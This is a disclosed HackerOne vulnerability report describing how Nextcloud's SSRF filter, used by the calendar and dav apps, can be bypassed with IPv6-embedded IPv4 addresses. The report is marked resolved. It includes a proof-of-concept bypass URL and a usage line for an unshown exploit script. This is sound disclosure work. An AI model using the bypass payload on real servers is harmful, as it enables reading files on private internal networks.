SSRF protection bypass

Disclosed: 2020-03-14 10:10:57 By foobar7 To nextcloud
Medium
Vulnerability Details
CVSS ---- High 7.7 [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N) Description ----------- The filter which protects Nextcloud from SSRF can be bypassed using IPv6/IPv4 address embedding. SSRF protection is for example used in the calendar or dav apps. Successful exploitation of the issue will allow reading of files in the local network with the authorization of the server hosting Nextcloud. POC --- The following example can be used to bypass the SSRF filter, where `127.0.0.1` is the server hosting the file: http://[0:0:0:0:0:ffff:127.0.0.1]/thefile The issue can for example be exploited in the calendar app with the attached exploit. Usage: python nextcloud_ssrf.py http://192.168.0.105/nextcloud/nextcloud/ admin "[password]" http://[0:0:0:0:0:ffff:127.0.0.1]:80/secret.ics BEGIN:VCALENDAR VERSION:2.0 PRODID:-//hacksw/handcal//NONSGML v1.0//EN BEGIN:VEVENT UID:[email protected] DTSTAMP:19970714T170000Z ORGANIZER;CN=John Doex:MAILTO:[email protected] DTSTART:19970714T170000Z DTEND:19970715T035959Z SUMMARY:Bastille Day Party GEO:48.85299;2.36885 END:VEVENT END:VCALENDAR ## Impact exfiltrate data from the internal network and perform actions in the name of the server in the internal network
Actions
View on HackerOne
Report Stats
  • Report ID: 736867
  • State: Closed
  • Substate: resolved
  • Upvotes: 18
Share this report